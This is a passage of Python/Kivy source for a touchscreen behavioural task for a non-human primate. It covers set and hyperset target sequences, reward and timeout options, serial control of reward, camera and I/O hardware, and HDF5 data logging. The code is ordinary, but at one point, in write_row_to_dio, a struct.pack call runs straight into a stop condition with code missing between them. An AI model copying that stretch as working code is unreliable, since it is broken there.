Sets per hyperset\r\n nsets_per_hyperset = 5\r\n \r\n # Inter Set Interval\r\n ISetI_mean = .5\r\n ISetI_std = .1\r\n \r\n # Inter HyperSet Interval\r\n IHSI_mean = 1.\r\n IHSI_std = .2\r\n \r\n # Target Radius \r\n target_rad = 1.5 # cm\r\n \r\n # Exit Button Settings \r\n # exit_pos1 = np.array([9*fixed_window_size[0]/(10*pix_per_cm), 9*fixed_window_size[1]/(10*pix_per_cm)]) # cm\r\n # exit_pos2 = np.array([9*fixed_window_size[0]/(10*pix_per_cm), 1*fixed_window_size[1]/(10*pix_per_cm)]) # cm\r\n exit_pos1 = np.array([18, 2])\r\n exit_pos2 = np.array([18, 10])\r\n exit_rad = 1. # cm\r\n exit_hold = 2 # seconds\r\n \r\n # Indicator Light Settings\r\n indicator_pos = np.array([8, 5]) # cm\r\n \r\n # Home Hold Times\r\n ch_timeout = 10. # ch timeout\r\n cht = .001 # how long to hold in the center until reward?\r\n \r\n # Target Hold Times\r\n set_timeout_time = 5. # how long does the target stay on the screen until it disappears and move to next trial?\r\n tht = .001 # how long to hold in target until reward?\r\n \r\n # Initialize variables for tracking cursor position \r\n cursor = {}\r\n cursor_start = {}\r\n cursor_ids = []\r\n \r\n # Initialize Touch and Prev Touch Boolean\r\n anytouch_prev = False\r\n touch = False\r\n \r\n # Error Timeout Times\r\n touch_error_timeout = 0.\r\n timeout_error_timeout = 0.\r\n hold_error_timeout = 0.\r\n drag_error_timeout = 0.\r\n \r\n # T/F Done with Initialization\r\n done_init = False\r\n \r\n # Initialize array of previous exit times?\r\n prev_exit_ts = np.array([0,0])\r\n\r\n # Number of trials: \r\n trial_counter = NumericProperty(0)\r\n #indicator_txt = StringProperty('o')\r\n #indicator_txt_color = ListProperty([.5, .5, .5, 1.])\r\n \r\n # Percent of hyperset complete\r\n percent_done = NumericProperty(0)\r\n\r\n t0 = time.time()\r\n\r\n cht_text = StringProperty('')\r\n tht_text = StringProperty('')\r\n targ_size_text = StringProperty('')\r\n big_rew_text = StringProperty('')\r\n cht_param = StringProperty('')\r\n tht_param = StringProperty('')\r\n targ_size_param = StringProperty('')\r\n big_rew_time_param = StringProperty('')\r\n \r\n \r\n # Define what to do when there is a touch on the screen\r\n def on_touch_down(self, touch):\r\n #handle many touchs:\r\n ud = touch.ud\r\n\r\n # Add new touch to ids: \r\n self.cursor_ids.append(touch.uid)\r\n\r\n # Add cursor\r\n curs = pix2cm(np.array([touch.x, touch.y]))\r\n self.cursor[touch.uid] = curs.copy()\r\n self.cursor_start[touch.uid] = curs.copy()\r\n\r\n # set self.touch to True\r\n self.touch = True\r\n \r\n \r\n def on_touch_move(self, touch):\r\n self.cursor[touch.uid] = pix2cm(np.array([touch.x, touch.y]))\r\n self.touch = True\r\n \r\n def on_touch_up(self, touch):\r\n self.touch = False\r\n try:\r\n self.cursor_ids.remove(touch.uid)\r\n _ = self.cursor.pop(touch.uid)\r\n except:\r\n print('removing touch from pre-game screen')\r\n \r\n \r\n # Get the initial parameters\r\n def init(self, animal_names_dict=None, rew_tone_every=None, rew_in=None, task_in=None,\r\n set_id_selected = None, test=None, hold=None, error_types_selected=None, nontarg_tol=None,\r\n autoquit=None, rew_var=None, set_timeout = None, error_timeout_time=None, ):\r\n \r\n # Initialize a count of the number of rewards\r\n # NOTE: this is necessary for scheduling rewards if you are not rewarding\r\n # 100% of the time, but the option to reward <100% of the time is NOT supported yet\r\n self.rew_cnt = 0\r\n self.set_rew_cnt = 0\r\n\r\n # Do you want to use an exxternal capacitive touch sensor?\r\n self.use_cap_sensor = False\r\n\r\n if self.use_cap_sensor:\r\n self.serial_port_cap = serial.Serial(port='COM5')\r\n \r\n self.rhtouch_sensor = 0.\r\n \r\n # Initiralize the 16 target positions\r\n # self.possible_target_pos_x = np.array([self.center_x-0.375*self.width, self.center_x-0.125*self.width, self.center_x+0.125*self.width, self.center_x+0.375*self.width, \r\n # self.center_x-0.375*self.width, self.center_x-0.125*self.width, self.center_x+0.125*self.width, self.center_x+0.375*self.width, \r\n # self.center_x-0.375*self.width, self.center_x-0.125*self.width, self.center_x+0.125*self.width, self.center_x+0.375*self.width, \r\n # self.center_x-0.375*self.width, self.center_x-0.125*self.width, self.center_x+0.125*self.width, self.center_x+0.375*self.width])\r\n # self.possible_target_pos_y = np.array([self.center_y+0.375*self.height, self.center_y+0.375*self.height, self.center_y+0.375*self.height, self.center_y+0.375*self.height, \r\n # self.center_y+0.125*self.height, self.center_y+0.125*self.height, self.center_y+0.125*self.height, self.center_y+0.125*self.height, \r\n # self.center_y-0.125*self.height, self.center_y-0.125*self.height, self.center_y-0.125*self.height, self.center_y-0.125*self.height, \r\n # self.center_y-0.375*self.height, self.center_y-0.375*self.height, self.center_y-0.375*self.height, self.center_y-0.375*self.height])\r\n \r\n \r\n self.possible_target_pos_x = np.array([6.75, 9, 11.25, 13.5, 6.75, 9, 11.25, 13.5, 6.75, 9, 11.25, 13.5, 6.75, 9, 11.25, 13.5]) # determined through trial and error\r\n self.possible_target_pos_y = np.array([2.25, 2.25, 2.25, 2.25, 4.5, 4.5, 4.5, 4.5, 6.75, 6.75, 6.75, 6.75, 9, 9, 9, 9])\r\n \r\n # self.possible_target_pos_x = np.array([fixed_window_size[0]/(5*pix_per_cm), 2*fixed_window_size[0]/(5*pix_per_cm), 3*fixed_window_size[0]/(5*pix_per_cm), 4*fixed_window_size[0]/(5*pix_per_cm), \r\n # fixed_window_size[0]/(5*pix_per_cm), 2*fixed_window_size[0]/(5*pix_per_cm), 3*fixed_window_size[0]/(5*pix_per_cm), 4*fixed_window_size[0]/(5*pix_per_cm), \r\n # fixed_window_size[0]/(5*pix_per_cm), 2*fixed_window_size[0]/(5*pix_per_cm), 3*fixed_window_size[0]/(5*pix_per_cm), 4*fixed_window_size[0]/(5*pix_per_cm), \r\n # fixed_window_size[0]/(5*pix_per_cm), 2*fixed_window_size[0]/(5*pix_per_cm), 3*fixed_window_size[0]/(5*pix_per_cm), 4*fixed_window_size[0]/(5*pix_per_cm)])\r\n # self.possible_target_pos_y = np.array([fixed_window_size[1]/(5*pix_per_cm), fixed_window_size[1]/(5*pix_per_cm), fixed_window_size[1]/(5*pix_per_cm), fixed_window_size[1]/(5*pix_per_cm), \r\n # 2*fixed_window_size[1]/(5*pix_per_cm), 2*fixed_window_size[1]/(5*pix_per_cm), 2*fixed_window_size[1]/(5*pix_per_cm), 2*fixed_window_size[1]/(5*pix_per_cm), \r\n # 3*fixed_window_size[1]/(5*pix_per_cm), 3*fixed_window_size[1]/(5*pix_per_cm), 3*fixed_window_size[1]/(5*pix_per_cm), 3*fixed_window_size[1]/(5*pix_per_cm), \r\n # 4*fixed_window_size[1]/(5*pix_per_cm), 4*fixed_window_size[1]/(5*pix_per_cm), 4*fixed_window_size[1]/(5*pix_per_cm), 4*fixed_window_size[1]/(5*pix_per_cm)])\r\n \r\n \r\n # Which sets comprise the hyperset? \r\n self.sets_selected = []\r\n for i, val in enumerate(set_id_selected['set_sel']):\r\n if val:\r\n self.sets_selected.append(i)\r\n \r\n # Record the number of sets per hyperset\r\n self.nsets_per_hyperset = len(self.sets_selected)\r\n \r\n # How long does the set stay on the screen until it disappears and move to next trial? \r\n set_timeout_opts = [15, 30, 45, 60]\r\n for i, val in enumerate(set_timeout['tt']):\r\n if val:\r\n self.set_timeout_time = set_timeout_opts[i]\r\n \r\n # Play reward tone for every correct press?\r\n if rew_tone_every['rew_tone_every'][0]:\r\n self.rew_tone_every = True\r\n else:\r\n self.rew_tone_every = False\r\n \r\n # How long to give rewards for touching any target?\r\n anytarg_rew_opts = [0., .1, .3, .5]\r\n for i, val in enumerate(rew_in['anytarg_rew']):\r\n if val:\r\n self.anytarg_rew = anytarg_rew_opts[i]\r\n self.reward_for_targtouch = [self.anytarg_rew > 0, self.anytarg_rew]\r\n \r\n # How long to give rewards for a complete set?\r\n set_rew_opts = [0., .1, .3, .5]\r\n for i, val in enumerate(rew_in['set_rew']):\r\n if val:\r\n self.set_rew = set_rew_opts[i]\r\n self.reward_for_set = [self.set_rew > 0, self.set_rew]\r\n \r\n # How long to give rewards for a complete hyperset?\r\n hs_rew_opts = [.3, .5, .7]\r\n for i, val in enumerate(rew_in['hs_rew']):\r\n if val:\r\n self.hs_rew = hs_rew_opts[i]\r\n \r\n # What counts as an error?\r\n # self.nontarg_is_error = error_types_selected['error_type'][0]\r\n self.t2p_first_is_error = error_types_selected['error_type'][0]\r\n \r\n # How far away from a target do we tolerate touches?\r\n nontarg_tol_opts = [100, 3.0, 2.5, 2.0, 1.5, 1.0] # convert the percentage options to proportion of radius\r\n for i, val in enumerate(nontarg_tol['nontarg_touch_tolerance']):\r\n if val:\r\n self.nontarget_error_tolerance = nontarg_tol_opts[i]\r\n \r\n # How long is the error timmeout?\r\n error_timeout_opts = [0.5, 1.0, 1.5, 2.0]\r\n for i, val in enumerate(error_timeout_time['error_to_time']):\r\n if val:\r\n self.error_timeout_time = error_timeout_opts[i]\r\n \r\n # Is this a test session?\r\n self.testing = True\r\n \r\n # How big are the targets?\r\n target_rad_opts = [.5, .75, .82, .91, 1.0, 1.125]\r\n for i, val in enumerate(task_in['targ_rad']):\r\n if val:\r\n self.target_rad = target_rad_opts[i]\r\n \r\n # What is the animal's name?\r\n for i, (nm, val) in enumerate(animal_names_dict.items()):\r\n if val:\r\n animal_name = nm\r\n \r\n # How long to hold the home and target buttons?\r\n holdz = [0.0, 0.1, .375, .5, .575, .6, '.4-.6']\r\n \r\n self.cht_type = None\r\n self.tht_type = None\r\n\r\n for i, val in enumerate(hold['hold']):\r\n if val:\r\n if type(holdz[i]) is str:\r\n mx, mn = holdz[i].split('-')\r\n self.tht_type = holdz[i]\r\n self.tht = (float(mn)+float(mx))*.5\r\n else:\r\n self.tht = holdz[i]\r\n\r\n for i, val in enumerate(hold['chold']):\r\n if val:\r\n if type(holdz[i]) is str:\r\n mx, mn = holdz[i].split('-')\r\n self.cht_type = holdz[i]\r\n self.cht = (float(mn)+float(mx))*.5\r\n else:\r\n self.cht = holdz[i]\r\n try:\r\n pygame.mixer.init() \r\n except:\r\n pass\r\n\r\n # How long is the delay from achieve to receive reward\r\n self.reward_delay_time = 0.0\r\n \r\n # What is the reward variance?\r\n reward_var_opt = [1.0, .5, .33]\r\n for i, val in enumerate(rew_var['rew_var']):\r\n if val:\r\n self.percent_of_trials_rewarded = reward_var_opt[i]\r\n if self.percent_of_trials_rewarded == 0.33:\r\n self.percent_of_trials_doubled = 0.1\r\n else:\r\n self.percent_of_trials_doubled = 0.0\r\n \r\n # Generate the rewards\r\n self.reward_generator = self.gen_rewards(self.percent_of_trials_rewarded, self.percent_of_trials_doubled,\r\n self.reward_for_targtouch)\r\n \r\n # Auto-quit after how many trials?\r\n autoquit_trls = [10, 25, 50, 100, 10**10]\r\n for i, val in enumerate(autoquit['autoquit']):\r\n if val: \r\n self.max_trials = autoquit_trls[i]\r\n \r\n # Is it okay to drag fingers into target?\r\n # drag_ok = [True, False]\r\n # for i, val in enumerate(drag['drag']):\r\n # if val:\r\n # self.drag_ok = drag_ok[i]\r\n self.drag_ok = False;\r\n \r\n # Preload sounds: \r\n self.reward1 = SoundLoader.load('reward1.wav')\r\n self.reward2 = SoundLoader.load('reward2.wav')\r\n \r\n # Initialize what state we are in\r\n self.state = 'IHSI'\r\n self.state_start = time.time()\r\n self.IHSI = self.IHSI_std + self.IHSI_mean\r\n \r\n # Initialize the set number\r\n self.set_ix = 1\r\n \r\n # Initialize targets\r\n self.target1.set_size(2*self.target_rad)\r\n self.target1.move(np.array([0., 0.]))\r\n self.target2.set_size(2*self.target_rad)\r\n self.target2.move(np.array([0., 0.]))\r\n \r\n # Initialize buttons\r\n self.button1_out.set_size(2*self.target_rad)\r\n self.button1_out.move(np.array([0., 0.]))\r\n self.button1_in.set_size(2*self.target_rad-0.1)\r\n self.button1_in.move(np.array([0., 0.]))\r\n self.button2_out.set_size(2*self.target_rad)\r\n self.button2_out.move(np.array([0., 0.]))\r\n self.button2_in.set_size(2*self.target_rad-0.1)\r\n self.button2_in.move(np.array([0., 0.]))\r\n self.button3_out.set_size(2*self.target_rad)\r\n self.button3_out.move(np.array([0., 0.]))\r\n self.button3_in.set_size(2*self.target_rad-0.1)\r\n self.button3_in.move(np.array([0., 0.]))\r\n self.button4_out.set_size(2*self.target_rad)\r\n self.button4_out.move(np.array([0., 0.]))\r\n self.button4_in.set_size(2*self.target_rad-0.1)\r\n self.button4_in.move(np.array([0., 0.]))\r\n self.button5_out.set_size(2*self.target_rad)\r\n self.button5_out.move(np.array([0., 0.]))\r\n self.button5_in.set_size(2*self.target_rad-0.1)\r\n self.button5_in.move(np.array([0., 0.]))\r\n self.button6_out.set_size(2*self.target_rad)\r\n self.button6_out.move(np.array([0., 0.]))\r\n self.button6_in.set_size(2*self.target_rad-0.1)\r\n self.button6_in.move(np.array([0., 0.]))\r\n self.button7_out.set_size(2*self.target_rad)\r\n self.button7_out.move(np.array([0., 0.]))\r\n self.button7_in.set_size(2*self.target_rad-0.1)\r\n self.button7_in.move(np.array([0., 0.]))\r\n self.button8_out.set_size(2*self.target_rad)\r\n self.button8_out.move(np.array([0., 0.]))\r\n self.button8_in.set_size(2*self.target_rad-0.1)\r\n self.button8_in.move(np.array([0., 0.]))\r\n self.button9_out.set_size(2*self.target_rad)\r\n self.button9_out.move(np.array([0., 0.]))\r\n self.button9_in.set_size(2*self.target_rad-0.1)\r\n self.button9_in.move(np.array([0., 0.]))\r\n self.button10_out.set_size(2*self.target_rad)\r\n self.button10_out.move(np.array([0., 0.]))\r\n self.button10_in.set_size(2*self.target_rad-0.1)\r\n self.button10_in.move(np.array([0., 0.]))\r\n self.button11_out.set_size(2*self.target_rad)\r\n self.button11_out.move(np.array([0., 0.]))\r\n self.button11_in.set_size(2*self.target_rad-0.1)\r\n self.button11_in.move(np.array([0., 0.]))\r\n self.button12_out.set_size(2*self.target_rad)\r\n self.button12_out.move(np.array([0., 0.]))\r\n self.button12_in.set_size(2*self.target_rad-0.1)\r\n self.button12_in.move(np.array([0., 0.]))\r\n self.button13_out.set_size(2*self.target_rad)\r\n self.button13_out.move(np.array([0., 0.]))\r\n self.button13_in.set_size(2*self.target_rad-0.1)\r\n self.button13_in.move(np.array([0., 0.]))\r\n self.button14_out.set_size(2*self.target_rad)\r\n self.button14_out.move(np.array([0., 0.]))\r\n self.button14_in.set_size(2*self.target_rad-0.1)\r\n self.button14_in.move(np.array([0., 0.]))\r\n self.button15_out.set_size(2*self.target_rad)\r\n self.button15_out.move(np.array([0., 0.]))\r\n self.button15_in.set_size(2*self.target_rad-0.1)\r\n self.button15_in.move(np.array([0., 0.]))\r\n self.button16_out.set_size(2*self.target_rad)\r\n self.button16_out.move(np.array([0., 0.]))\r\n self.button16_in.set_size(2*self.target_rad-0.1)\r\n self.button16_in.move(np.array([0., 0.]))\r\n \r\n \r\n # Initialize the exit buttons\r\n self.exit_target1.set_size(2*self.exit_rad)\r\n self.exit_target1.move(self.exit_pos1)\r\n self.exit_target1.color = (.15, .15, .15, 1)\r\n self.exit_target2.set_size(2*self.exit_rad)\r\n self.exit_target2.move(self.exit_pos2)\r\n self.exit_target2.color = (.15, .15, .15, 1)\r\n \r\n # # Initialize PD Indicator\r\n # self.indicator_targ.set_size(self.exit_rad)\r\n # self.indicator_targ.move(self.indicator_pos)\r\n # self.indicator_targ.color = (0., 0., 0., 1.)\r\n \r\n # Determine the hypersets (every 2 numbers comprises a set)\r\n self.target_list = np.array([[1, 12, 4, 15, 14, 3, 4, 11, 7, 0], [5, 6, 7, 8, 9, 10, 11, 12, 13, 14]])\r\n \r\n # Initialize the Target and Home position\r\n self.target_HS_index = 0\r\n self.target_index = np.array([2*(self.set_ix-1), 2*(self.set_ix-1)+1])\r\n self.repeat = False\r\n self.home_position = np.array([0., 0.])\r\n self.target1_position = np.array([self.possible_target_pos_x[self.target_list[self.target_HS_index, self.target_index[0]]], self.possible_target_pos_y[self.target_list[self.target_HS_index, self.target_index[0]]]])\r\n self.target2_position = np.array([self.possible_target_pos_x[self.target_list[self.target_HS_index, self.target_index[1]]], self.possible_target_pos_y[self.target_list[self.target_HS_index, self.target_index[1]]]])\r\n \r\n # Initialize FSM Dictionary\r\n self.FSM = dict()\r\n \r\n # Determine the relative task update functions for each task state\r\n self.FSM['IHSI'] = dict(end_IHSI='vid_trig', stop=None)\r\n self.FSM['vid_trig'] = dict(rhtouch='set', stop=None)\r\n \r\n self.FSM['set'] = dict(touch_target1 = 'targ1_hold', touch_target2 = 'targ2_hold', touch_nontarg = 'set_error', set_timeout='timeout_error', stop=None,\r\n non_rhtouch='RH_touch')#,touch_not_target='touch_error')\r\n \r\n self.FSM['targ1_hold'] = dict(finish_targ_hold='targ1_pressed', early_leave_target1_hold = 'hold_error_nopress', \r\n targ1_drag_out = 'drag_error_nopress', stop=None, non_rhtouch='RH_touch')\r\n self.FSM['targ2_hold'] = dict(finish_targ_hold='targ2_pressed', early_leave_target2_hold = 'hold_error_nopress',\r\n targ2_drag_out = 'drag_error_nopress', stop=None, non_rhtouch='RH_touch')\r\n \r\n self.FSM['targ1_pressed'] = dict(touch_target2 ='t1p_targ2_hold', touch_nontarg = 'set_error', set_timeout='timeout_error', stop=None,\r\n non_rhtouch='RH_touch')\r\n self.FSM['targ2_pressed'] = dict(t2p_first_error = 'set_error', touch_target1 ='t2p_targ1_hold', touch_nontarg = 'set_error', set_timeout='timeout_error', stop=None,\r\n non_rhtouch='RH_touch')\r\n \r\n self.FSM['t1p_targ2_hold'] = dict(finish_targ_hold='set_complete', early_leave_target2_hold = 'hold_error_t1p',\r\n targ2_drag_out = 'drag_error_t1p', stop=None, non_rhtouch='RH_touch')\r\n self.FSM['t2p_targ1_hold'] = dict(finish_targ_hold='set_error', early_leave_target1_hold = 'hold_error_t2p',\r\n targ1_drag_out = 'drag_error_t2p', stop=None, non_rhtouch='RH_touch')\r\n \r\n self.FSM['set_error'] = dict(end_set_error='IHSI', stop=None)\r\n self.FSM['set_complete'] = dict(hyperset_complete = 'reward_hyperset', next_set = 'reward_set', stop=None, non_rhtouch='RH_touch')\r\n self.FSM['reward_set'] = dict(end_reward_set = 'set', stop=None, non_rhtouch='RH_touch')\r\n self.FSM['reward_hyperset'] = dict(end_reward_hyperset = 'IHSI', stop=None, non_rhtouch='RH_touch')\r\n \r\n self.FSM['timeout_error'] = dict(end_timeout_error='IHSI', stop=None, non_rhtouch='RH_touch')\r\n self.FSM['hold_error_nopress'] = dict(end_hold_error_nopress='set', stop=None, non_rhtouch='RH_touch')\r\n self.FSM['drag_error_nopress'] = dict(end_drag_error_nopress='set', stop=None, non_rhtouch='RH_touch')\r\n \r\n self.FSM['hold_error_t1p'] = dict(end_hold_error_t1p='targ1_pressed', stop=None, non_rhtouch='RH_touch')\r\n self.FSM['drag_error_t1p'] = dict(end_drag_error_t1p='targ1_pressed', stop=None, non_rhtouch='RH_touch')\r\n \r\n self.FSM['hold_error_t2p'] = dict(end_hold_error_t2p='targ2_pressed', stop=None, non_rhtouch='RH_touch')\r\n self.FSM['drag_error_t2p'] = dict(end_drag_error_t2p='targ2_pressed', stop=None, non_rhtouch='RH_touch')\r\n \r\n # self.FSM['rew_anytouch'] = dict(end_rewanytouch='target', stop=None, non_rhtouch='RH_touch')\r\n self.FSM['idle_exit'] = dict(stop=None)\r\n \r\n \r\n # Test the COM ports for the reward and camera\r\n try:\r\n self.reward_port = serial.Serial(port='COM4',\r\n baudrate=115200)\r\n self.reward_port.close()\r\n except:\r\n pass\r\n\r\n try:\r\n self.dio_port = serial.Serial(port='COM5', baudrate=115200)\r\n time.sleep(4.)\r\n except:\r\n pass\r\n\r\n try:\r\n self.cam_trig_port = serial.Serial(port='COM6', baudrate=9600)\r\n time.sleep(3.)\r\n # Say hello: \r\n self.cam_trig_port.write('a'.encode())\r\n\r\n # Start cams @ 50 Hz\r\n self.cam_trig_port.write('1'.encode())\r\n except:\r\n pass\r\n\r\n # save parameters: \r\n d = dict(animal_name=animal_name, target_rad=self.target_rad,\r\n sets_selected = self.sets_selected, \r\n ISetI_mean=self.ISetI_mean, ISetI_std = self.ISetI_std, \r\n IHSI_mean=self.IHSI_mean, IHSI_std = self.IHSI_std, \r\n targ_hold_time = self.tht,\r\n ch_timeout=self.ch_timeout, \r\n anytarg_rew_time=self.anytarg_rew,\r\n set_rew_time = self.set_rew,\r\n hs_rew_time=self.hs_rew,\r\n timeout_error_timeout = self.timeout_error_timeout,\r\n hold_error_timeout = self.hold_error_timeout,\r\n drag_error_timeout = self.drag_error_timeout,\r\n start_time = datetime.datetime.now().strftime('%Y%m%d_%H%M'),\r\n testing=self.testing,\r\n rew_delay = self.reward_delay_time,\r\n use_cap_sensor = self.use_cap_sensor,\r\n drag_ok = self.drag_ok,\r\n )\r\n\r\n print(self.anytarg_rew)\r\n print(self.set_rew)\r\n print(self.hs_rew)\r\n\r\n try:\r\n if self.testing:\r\n pass\r\n\r\n else:\r\n import os\r\n path = os.getcwd()\r\n path = path.split('\\\\')\r\n path_data = [p for p in path if np.logical_and('Touchscreen' not in p, 'Targ' not in p)]\r\n path_root = ''\r\n for ip in path_data:\r\n path_root += ip+'/'\r\n p = path_root + 'data/'\r\n\r\n # Check if this directory exists: \r\n if os.path.exists(p):\r\n pass\r\n else:\r\n p = path_root+ 'data_tmp_'+datetime.datetime.now().strftime('%Y%m%d')+'/'\r\n if os.path.exists(p):\r\n pass\r\n else:\r\n os.mkdir(p)\r\n print('Making temp directory: ', p)\r\n\r\n print ('')\r\n print ('')\r\n print('Data saving PATH: ', p)\r\n print ('')\r\n print ('')\r\n self.filename = p+ animal_name+'_'+datetime.datetime.now().strftime('%Y%m%d_%H%M')\r\n if self.in_cage:\r\n self.filename = self.filename+'_cage'\r\n\r\n pickle.dump(d, open(self.filename+'_params.pkl', 'wb'))\r\n self.h5file = tables.open_file(self.filename + '_data.hdf', mode='w', title = 'NHP data')\r\n self.h5_table = self.h5file.create_table('/', 'task', Data, '')\r\n self.h5_table_row = self.h5_table.row\r\n self.h5_table_row_cnt = 0\r\n\r\n # Note in python 3 to open pkl files: \r\n #with open('xxxx_params.pkl', 'rb') as f:\r\n # data_params = pickle.load(f)\r\n except:\r\n pass\r\n \r\n # Function for Closing the App\r\n def close_app(self):\r\n # Save Data Eventually\r\n #Stop the video: \r\n try:\r\n self.cam_trig_port.write('0'.encode())\r\n except:\r\n pass\r\n\r\n if self.use_cap_sensor:\r\n self.serial_port_cap.close()\r\n \r\n if self.idle:\r\n self.state = 'idle_exit'\r\n self.trial_counter = -1\r\n\r\n # Set relevant params text: \r\n self.cht_text = 'Home Hold Time: '\r\n self.tht_text = 'Target Hold Time: '\r\n self.targ_size_text = 'Target Radius: '\r\n self.big_rew_text = 'Big Reward Time: '\r\n\r\n if type(self.cht_type) is str:\r\n self.cht_param = self.cht_type\r\n else:\r\n self.cht_param = 'Constant: ' + str(self.cht)\r\n\r\n if type(self.tht_type) is str:\r\n self.tht_param = self.tht_type\r\n else:\r\n self.tht_param = 'Constant: ' + str(self.tht)\r\n\r\n self.targ_size_param = str(self.target_rad)\r\n self.big_rew_time_param = str(self.reward_for_targtouch[1])\r\n\r\n else:\r\n App.get_running_app().stop()\r\n Window.close()\r\n \r\n def update(self, ts):\r\n self.state_length = time.time() - self.state_start\r\n self.rew_cnt += 1\r\n # self.set_rew_cnt += 1\r\n \r\n # Run task update functions: \r\n for f, (fcn_test_name, next_state) in enumerate(self.FSM[self.state].items()):\r\n kw = dict(ts=self.state_length)\r\n\r\n fcn_test = getattr(self, fcn_test_name)\r\n if fcn_test(**kw):\r\n # if stop: close the app\r\n if fcn_test_name == 'stop':\r\n self.close_app()\r\n\r\n else:\r\n # Run any 'end' fcns from prevoius state: \r\n end_state_fn_name = \"_end_%s\" % self.state\r\n if hasattr(self, end_state_fn_name):\r\n end_state_fn = getattr(self, end_state_fn_name)\r\n end_state_fn()\r\n \r\n # Advance to the next state\r\n self.prev_state = self.state_length\r\n # if next_state is 'set_error':\r\n # import pdb; pdb.set_trace()\r\n self.state = next_state\r\n \r\n self.state_start = time.time()\r\n\r\n # Run any starting functions: \r\n start_state_fn_name = \"_start_%s\" % self.state\r\n if hasattr(self, start_state_fn_name):\r\n start_state_fn = getattr(self, start_state_fn_name)\r\n start_state_fn()\r\n else:\r\n while_state_fn_name = \"_while_%s\" % self.state\r\n if hasattr(self, while_state_fn_name):\r\n while_state_fn = getattr(self, while_state_fn_name)\r\n while_state_fn()\r\n \r\n if self.use_cap_sensor:\r\n try:\r\n self.serial_port_cap.flushInput()\r\n port_read = self.serial_port_cap.read(4)\r\n if str(port_read[:2]) == \"b'N1'\":\r\n self.rhtouch_sensor = False\r\n elif str(port_read[:2]) == \"b'C1'\":\r\n self.rhtouch_sensor = True\r\n print(self.rhtouch_sensor)\r\n except:\r\n print('passing state! ')\r\n pass \r\n \r\n # Save the data if this is not a test or we arent exiting\r\n if self.testing:\r\n pass\r\n else:\r\n if self.state == 'idle_exit':\r\n pass\r\n else:\r\n self.write_to_h5file()\r\n \r\n # Function for saving the data\r\n def write_to_h5file(self):\r\n self.h5_table_row['state']= self.state; \r\n cursor = np.zeros((10, 2))\r\n cursor[:] = np.nan\r\n for ic, curs_id in enumerate(self.cursor_ids):\r\n cursor[ic, :] = self.cursor[curs_id]\r\n\r\n self.h5_table_row['cursor'] = cursor\r\n\r\n cursor_id = np.zeros((10, ))\r\n cursor_id[:] = np.nan\r\n cursor_id[:len(self.cursor_ids)] = self.cursor_ids\r\n self.h5_table_row['cursor_ids'] = cursor_id\r\n\r\n self.h5_table_row['set_ix'] = self.set_ix\r\n self.h5_table_row['time'] = time.time() - self.t0\r\n self.h5_table_row['cap_touch'] = self.rhtouch_sensor\r\n self.h5_table_row.append()\r\n\r\n # Write DIO \r\n try:\r\n self.write_row_to_dio()\r\n except:\r\n pass\r\n \r\n # Upgrade table row: \r\n self.h5_table_row_cnt += 1\r\n \r\n def write_row_to_dio(self):\r\n ### FROM TDT TABLE, 5 is GND, BYTE A ###\r\n row_to_write = self.h5_table_row_cnt % 256\r\n\r\n ### write to arduino: \r\n word_str = b'd' + struct.pack('= self.max_trials, self.state == 'IHSI'):\r\n self.idle = True\r\n return True\r\n else:\r\n # Stop if both exit targets are held\r\n e = [0, 0]\r\n e[0] = self.check_if_cursors_in_targ(self.exit_pos1, self.exit_rad)\r\n e[1] = self.check_if_cursors_in_targ(self.exit_pos2, self.exit_rad)\r\n t = [0, 0]\r\n for i in range(2):\r\n if np.logical_and(self.prev_exit_ts[i] !=0, e[i] == True):\r\n t[i] = time.time() - self.prev_exit_ts[i]\r\n elif np.logical_and(self.prev_exit_ts[i] == 0, e[i]==True):\r\n self.prev_exit_ts[i] = time.time()\r\n else:\r\n self.prev_exit_ts[i] = 0\r\n \r\n if t[0] > self.exit_hold and t[1] > self.exit_hold:\r\n self.idle = False\r\n return True\r\n\r\n else:\r\n return False\r\n \r\n # IHSI State\r\n def _start_IHSI(self, **kwargs):\r\n try:\r\n self.cam_trig_port.write('0'.encode())\r\n except:\r\n pass\r\n \r\n # Make the screen dark\r\n Window.clearcolor = (0., 0., 0., 1.)\r\n self.change_allbutton_color(0, 0, 0, 1)\r\n self.exit_target1.color = (.15, .15, .15, 1.)\r\n self.exit_target2.color = (.15, .15, .15, 1.)\r\n \r\n # Set the set index to 1\r\n self.set_ix = 1;\r\n \r\n # Set IHSI, CHT, THT\r\n self.IHSI = np.random.random()*self.IHSI_std + self.IHSI_mean\r\n\r\n if type(self.cht_type) is str:\r\n cht_min, cht_max = self.cht_type.split('-')\r\n self.cht = ((float(cht_max) - float(cht_min)) * np.random.random()) + float(cht_min)\r\n\r\n if type(self.tht_type) is str:\r\n tht_min, tht_max = self.tht_type.split('-')\r\n self.tht = ((float(tht_max) - float(tht_min)) * np.random.random()) + float(tht_min) \r\n \r\n # Make all of the targets invisible\r\n self.target1.color = (0., 0., 0., 0.)\r\n self.target2.color = (0., 0., 0., 0.)\r\n # self.indicator_targ.color = (0., 0., 0., 0.)\r\n \r\n def end_IHSI(self, **kwargs):\r\n return kwargs['ts'] > self.IHSI\r\n \r\n # Video Trigger State\r\n def _start_vid_trig(self, **kwargs):\r\n if self.trial_counter == 0:\r\n time.sleep(1.)\r\n try: \r\n self.cam_trig_port.write('1'.encode())\r\n except:\r\n pass\r\n \r\n # Sets that come after the trigger must be the first set\r\n self.first_set_attempt = True\r\n\r\n if np.logical_and(self.use_cap_sensor, not self.rhtouch_sensor):\r\n self.target1.color = (1., 0., 0., 1.)\r\n self.target2.color = (1., 0., 0., 1.)\r\n Window.clearcolor = (1., 0., 0., 1.)\r\n\r\n # # Turn exit buttons redish:\r\n self.exit_target1.color = (.9, 0, 0, 1.)\r\n self.exit_target2.color = (.9, 0, 0, 1.)\r\n\r\n def end_vid_trig(self, **kwargs):\r\n return kwargs['ts'] > self.pre_start_vid_ts\r\n \r\n # Right hand on touch sensor\r\n def rhtouch(self, **kwargs):\r\n if self.use_cap_sensor:\r\n if self.rhtouch_sensor:\r\n return True\r\n else:\r\n return False\r\n else:\r\n return True\r\n\r\n def non_rhtouch(self, **kwargs):\r\n x = not self.rhtouch()\r\n # if x:\r\n # self.repeat = True\r\n return x\r\n \r\n # Start a new set\r\n def _start_set(self, **kwargs):\r\n self.touch = False ## We need to start with this being false or else if non-target touch tolerance is not infinity, the previous touch will carry over and cause an error\r\n Window.clearcolor = (0., 0., 0., 1.)\r\n \r\n # Display outlines of all of the buttons\r\n self.button1_out.move(np.array([self.possible_target_pos_x[0], self.possible_target_pos_y[0]]))\r\n self.button1_out.color = (1., 1., 0., 1.)\r\n 